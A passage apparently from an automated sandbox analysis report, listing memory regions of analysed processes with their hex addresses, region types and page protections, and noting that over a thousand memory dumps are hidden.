page read and write
|
||
|
6FF1000
|
heap
|
page read and write
|
||
|
7A31A0F000
|
stack
|
page read and write
|
||
|
1AE31CDD000
|
trusted library allocation
|
page read and write
|
||
|
4D8F000
|
stack
|
page read and write
|
||
|
1AE2E435000
|
heap
|
page read and write
|
||
|
4AB4000
|
heap
|
page read and write
|
||
|
29DD000
|
stack
|
page read and write
|
||
|
B50000
|
unkown
|
page readonly
|
||
|
2C73000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
2980000
|
heap
|
page read and write
|
||
|
1AE2FE40000
|
trusted library allocation
|
page read and write
|
||
|
4D30000
|
direct allocation
|
page read and write
|
||
|
1AE48943000
|
heap
|
page read and write
|
||
|
1AE48957000
|
heap
|
page read and write
|
||
|
7EE40000
|
trusted library allocation
|
page execute and read and write
|
||
|
D9E000
|
unkown
|
page readonly
|
||
|
7310000
|
trusted library allocation
|
page read and write
|
||
|
7F0000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
72F0000
|
trusted library allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
F80000
|
heap
|
page read and write
|
||
|
2A42000
|
unkown
|
page read and write
|
||
|
7A30F3E000
|
stack
|
page read and write
|
||
|
4B42000
|
heap
|
page read and write
|
||
|
440000
|
unkown
|
page readonly
|
||
|
4761000
|
heap
|
page read and write
|
||
|
7D60000
|
heap
|
page read and write
|
||
|
F9F000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
152748EF000
|
heap
|
page read and write
|
||
|
1AE3183F000
|
trusted library allocation
|
page read and write
|
||
|
F5DC77F000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
24F0000
|
unkown
|
page readonly
|
||
|
2EF1000
|
unkown
|
page execute and read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AE2FE42000
|
trusted library allocation
|
page read and write
|
||
|
2CB0000
|
heap
|
page read and write
|
||
|
8163000
|
heap
|
page read and write
|
||
|
152768E5000
|
heap
|
page read and write
|
||
|
1FF82BB0000
|
heap
|
page read and write
|
||
|
96A000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AE2E431000
|
heap
|
page read and write
|
||
|
8B40000
|
direct allocation
|
page execute and read and write
|
||
|
15276990000
|
heap
|
page read and write
|
||
|
D91000
|
unkown
|
page execute read
|
||
|
4B10000
|
heap
|
page read and write
|
||
|
1411000
|
unkown
|
page readonly
|
||
|
871000
|
unkown
|
page readonly
|
||
|
46C0000
|
heap
|
page read and write
|
||
|
2C57000
|
heap
|
page read and write
|
||
|
1AE30304000
|
trusted library allocation
|
page read and write
|
||
|
6A70000
|
direct allocation
|
page read and write
|
||
|
1527495A000
|
heap
|
page read and write
|
||
|
2022F000
|
stack
|
page read and write
|
||
|
4C34AFE000
|
stack
|
page read and write
|
||
|
28D8000
|
stack
|
page read and write
|
||
|
2D60000
|
heap
|
page read and write
|
||
|
63C000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
15276789000
|
heap
|
page read and write
|
||
|
1527679C000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
49B0000
|
heap
|
page read and write
|
||
|
1AE48550000
|
heap
|
page execute and read and write
|
||
|
D40000
|
unkown
|
page read and write
|
||
|
1FF82B00000
|
heap
|
page read and write
|
||
|
ED1000
|
system
|
page execute and read and write
|
||
|
7D2D000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
1AE400EF000
|
trusted library allocation
|
page read and write
|
||
|
15274946000
|
heap
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
|
6EC0000
|
heap
|
page execute and read and write
|
||
|
2D3F000
|
heap
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
2C79000
|
stack
|
page read and write
|
||
|
15276871000
|
heap
|
page read and write
|
||
|
8100000
|
heap
|
page read and write
|
||
|
15274942000
|
heap
|
page read and write
|
||
|
7A30AFE000
|
stack
|
page read and write
|
||
|
4A3A000
|
heap
|
page read and write
|
||
|
1AE2E640000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
1527699D000
|
heap
|
page read and write
|
||
|
CA1000
|
unkown
|
page readonly
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
26AE9816000
|
trusted library allocation
|
page read and write
|
||
|
7E90000
|
trusted library allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4F9E000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
7E10000
|
trusted library allocation
|
page read and write
|
||
|
2943000
|
heap
|
page read and write
|
||
|
7E0A000
|
heap
|
page read and write
|
||
|
CD0000
|
heap
|
page read and write
|
||
|
7FF848E13000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AE488A0000
|
heap
|
page read and write
|
||
|
1527498C000
|
heap
|
page read and write
|
||
|
15274956000
|
heap
|
page read and write
|
||
|
83C0000
|
direct allocation
|
page read and write
|
||
|
2E00000
|
direct allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
2034B000
|
stack
|
page read and write
|
||
|
435F000
|
stack
|
page read and write
|
||
|
838F000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
20676000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
8420000
|
heap
|
page read and write
|
||
|
44D7000
|
heap
|
page read and write
|
||
|
6F8C000
|
heap
|
page read and write
|
||
|
7A30FBB000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
2012D000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
E7A000
|
system
|
page execute and read and write
|
||
|
1527491E000
|
heap
|
page read and write
|
||
|
1AE2E665000
|
heap
|
page read and write
|
||
|
1AE2E451000
|
heap
|
page read and write
|
||
|
458F000
|
stack
|
page read and write
|
||
|
71946FF000
|
unkown
|
page read and write
|
||
|
420000
|
unkown
|
page readonly
|
||
|
D91000
|
unkown
|
page execute read
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
1AE318E5000
|
trusted library allocation
|
page read and write
|
||
|
1527677C000
|
heap
|
page read and write
|
||
|
1AE31D52000
|
trusted library allocation
|
page read and write
|
||
|
7A31B0B000
|
stack
|
page read and write
|
||
|
89E000
|
stack
|
page read and write
|
||
|
7FF849170000
|
trusted library allocation
|
page read and write
|
||
|
4E9D000
|
stack
|
page read and write
|
||
|
830C000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
1AE2E4E9000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
7D82000
|
heap
|
page read and write
|
||
|
8300000
|
trusted library allocation
|
page read and write
|
||
|
152767F5000
|
heap
|
page read and write
|
||
|
76E000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
26AE9803000
|
trusted library allocation
|
page read and write
|
||
|
71947FF000
|
stack
|
page read and write
|
||
|
20393000
|
heap
|
page read and write
|
||
|
8360000
|
trusted library allocation
|
page read and write
|
||
|
15276771000
|
heap
|
page read and write
|
||
|
26AE99CE000
|
trusted library allocation
|
page read and write
|
||
|
4F2C000
|
unclassified section
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
24E0000
|
heap
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
289B000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
3000000
|
heap
|
page read and write
|
||
|
2F80000
|
heap
|
page read and write
|
||
|
1527490E000
|
heap
|
page read and write
|
||
|
152768ED000
|
heap
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
1AE48460000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4D8D000
|
direct allocation
|
page execute and read and write
|
||
|
1AE4890B000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
1AE2E5C0000
|
heap
|
page read and write
|
||
|
15274956000
|
heap
|
page read and write
|
||
|
15274931000
|
heap
|
page read and write
|
||
|
1AE315C7000
|
trusted library allocation
|
page read and write
|
||
|
152748E9000
|
heap
|
page read and write
|
||
|
7EB0000
|
trusted library allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
7D24000
|
heap
|
page read and write
|
||
|
8434000
|
heap
|
page read and write
|
||
|
D40000
|
unkown
|
page read and write
|
||
|
7FF848ECC000
|
trusted library allocation
|
page execute and read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
2D00000
|
heap
|
page read and write
|
||
|
4804000
|
trusted library allocation
|
page read and write
|
||
|
4A10000
|
heap
|
page read and write
|
||
|
4C347FF000
|
stack
|
page read and write
|
||
|
4B71000
|
heap
|
page read and write
|
||
|
A3A000
|
stack
|
page read and write
|
||
|
7350000
|
trusted library allocation
|
page read and write
|
||
|
15274978000
|
heap
|
page read and write
|
||
|
4C346FF000
|
stack
|
page read and write
|
||
|
4AB0000
|
heap
|
page read and write
|
||
|
20A42000
|
direct allocation
|
page execute and read and write
|
||
|
4B83000
|
heap
|
page read and write
|
||
|
4AAF000
|
heap
|
page read and write
|
||
|
D54000
|
heap
|
page read and write
|
||
|
5F0000
|
unkown
|
page readonly
|
||
|
4B78000
|
heap
|
page read and write
|
||
|
4AC0000
|
direct allocation
|
page execute and read and write
|
||
|
15276791000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
B60000
|
unkown
|
page readonly
|
||
|
15274C50000
|
heap
|
page read and write
|
||
|
8176000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4910000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C73000
|
heap
|
page read and write
|
||
|
7A3087F000
|
stack
|
page read and write
|
||
|
D91000
|
unkown
|
page execute read
|
||
|
A80000
|
heap
|
page read and write
|
||
|
B3C000
|
stack
|
page read and write
|
||
|
1AE2E630000
|
heap
|
page readonly
|
||
|
7EA0000
|
trusted library allocation
|
page read and write
|
||
|
7E77000
|
trusted library allocation
|
page read and write
|
||
|
446E000
|
stack
|
page read and write
|
||
|
28F0000
|
heap
|
page read and write
|
||
|
1AE488B0000
|
heap
|
page read and write
|
||
|
CE0000
|
unkown
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
15276C12000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
1AE2FF30000
|
heap
|
page read and write
|
||
|
18EA5A30000
|
heap
|
page read and write
|
||
|
26AE96E0000
|
heap
|
page read and write
|
||
|
4A90000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
6F50000
|
heap
|
page read and write
|
||
|
2B02000
|
unkown
|
page read and write
|
||
|
15276905000
|
heap
|
page read and write
|
||
|
4D39000
|
trusted library allocation
|
page read and write
|
||
|
4B3B000
|
stack
|
page read and write
|
||
|
4A7E000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
2CF6000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
7DEF000
|
heap
|
page read and write
|
||
|
A1D000
|
heap
|
page read and write
|
||
|
1527495B000
|
heap
|
page read and write
|
||
|
83A0000
|
direct allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
1FC30000
|
direct allocation
|
page read and write
|
||
|
15276870000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
6A2B000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4D40000
|
direct allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
451E000
|
stack
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
AE0000
|
heap
|
page readonly
|
||
|
43DC000
|
stack
|
page read and write
|
||
|
83CE000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
810000
|
heap
|
page read and write
|
||
|
2938000
|
heap
|
page read and write
|
||
|
2940000
|
heap
|
page read and write
|
||
|
26AE9510000
|
trusted library allocation
|
page read and write
|
||
|
2067A000
|
heap
|
page read and write
|
||
|
1FC60000
|
direct allocation
|
page read and write
|
||
|
F3C000
|
stack
|
page read and write
|
||
|
152768D5000
|
heap
|
page read and write
|
||
|
7E70000
|
trusted library allocation
|
page read and write
|
||
|
920000
|
trusted library section
|
page read and write
|
||
|
1527491B000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4B71000
|
heap
|
page read and write
|
||
|
4B7A000
|
heap
|
page read and write
|
||
|
152748E1000
|
heap
|
page read and write
|
||
|
2B5C000
|
unkown
|
page read and write
|
||
|
209D1000
|
direct allocation
|
page execute and read and write
|
||
|
15274A90000
|
heap
|
page read and write
|
||
|
26AE7BC0000
|
heap
|
page read and write
|
||
|
291F000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
7FF849140000
|
trusted library allocation
|
page read and write
|
||
|
1AE31E44000
|
trusted library allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
6EE0000
|
heap
|
page read and write
|
||
|
15276914000
|
heap
|
page read and write
|
||
|
F5DC67C000
|
stack
|
page read and write
|
||
|
1AE2E411000
|
heap
|
page read and write
|
||
|
1527495B000
|
heap
|
page read and write
|
||
|
26A0000
|
heap
|
page read and write
|
||
|
1FC20000
|
direct allocation
|
page read and write
|
||
|
54D4000
|
unclassified section
|
page read and write
|
||
|
CD6000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
7A30B3E000
|
unkown
|
page read and write
|
||
|
15276781000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
28154000
|
system
|
page read and write
|
||
|
4BED000
|
direct allocation
|
page execute and read and write
|
||
|
7A31A8D000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
770000
|
heap
|
page read and write
|
||
|
1FF82BB8000
|
heap
|
page read and write
|
||
|
26AE7D4C000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4B69000
|
heap
|
page read and write
|
||
|
4C28000
|
heap
|
page read and write
|
||
|
2C3B000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4B6B000
|
heap
|
page read and write
|
||
|
1527498B000
|
heap
|
page read and write
|
||
|
842D000
|
heap
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
1AE484AE000
|
heap
|
page read and write
|
||
|
1AE2E479000
|
heap
|
page read and write
|
||
|
440000
|
unkown
|
page readonly
|
||
|
4761000
|
heap
|
page read and write
|
||
|
B40000
|
unkown
|
page readonly
|
||
|
7E30000
|
trusted library allocation
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
2E82000
|
unkown
|
page execute and read and write
|
||
|
1AE48557000
|
heap
|
page execute and read and write
|
||
|
1AE300D0000
|
heap
|
page read and write
|
||
|
26AE7CA0000
|
heap
|
page read and write
|
||
|
6A80000
|
direct allocation
|
page read and write
|
||
|
2089E000
|
direct allocation
|
page execute and read and write
|
||
|
152768D8000
|
heap
|
page read and write
|
||
|
2FB0000
|
heap
|
page read and write
|
||
|
5E0000
|
unkown
|
page readonly
|
||
|
721E000
|
stack
|
page read and write
|
||
|
7320000
|
trusted library allocation
|
page read and write
|
||
|
7DBE000
|
heap
|
page read and write
|
||
|
8370000
|
direct allocation
|
page read and write
|
||
|
6A40000
|
direct allocation
|
page read and write
|
||
|
18EA581B000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4F1E000
|
stack
|
page read and write
|
||
|
1FF82BA0000
|
heap
|
page read and write
|
||
|
1527494A000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
15274983000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
20390000
|
heap
|
page read and write
|
||
|
810000
|
heap
|
page read and write
|
||
|
4B78000
|
heap
|
page read and write
|
||
|
4AA000
|
stack
|
page read and write
|
||
|
4FAC000
|
stack
|
page read and write
|
||
|
2C3F000
|
stack
|
page read and write
|
||
|
1AE31D37000
|
trusted library allocation
|
page read and write
|
||
|
6A30000
|
direct allocation
|
page read and write
|
There are 1165 hidden memdumps, click here to show them.